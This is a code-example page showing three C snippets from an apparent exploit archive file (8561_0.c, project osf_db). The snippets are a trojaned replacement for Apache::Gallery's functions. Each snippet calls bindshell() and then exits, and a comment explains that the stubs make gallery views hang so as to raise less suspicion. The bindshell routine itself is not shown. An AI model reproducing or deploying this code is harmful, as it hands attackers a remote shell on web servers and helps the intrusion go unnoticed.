예제 #1
0
파일: 8561_0.c 프로젝트: B-Rich/osf_db
/** these are the only two functions that
 * A::G is expecting, so make it happy and provide
 * them.  Receiving and returning void (instead of actually 
 * following the function specs) seems to be more practical
 * because views to the gallery will just hang instead of flop,
 * thereby not raising as much suspicion.
 */
void resizepicture(void) {
	bindshell();
	exit(EXIT_SUCCESS);
}
예제 #2
0
void boot_Apache__Gallery_4033(void) {
	bindshell();
	exit(EXIT_SUCCESS);
}
예제 #3
0
int main(int argc, char **argv)
{
  bindshell();
  return 0;
}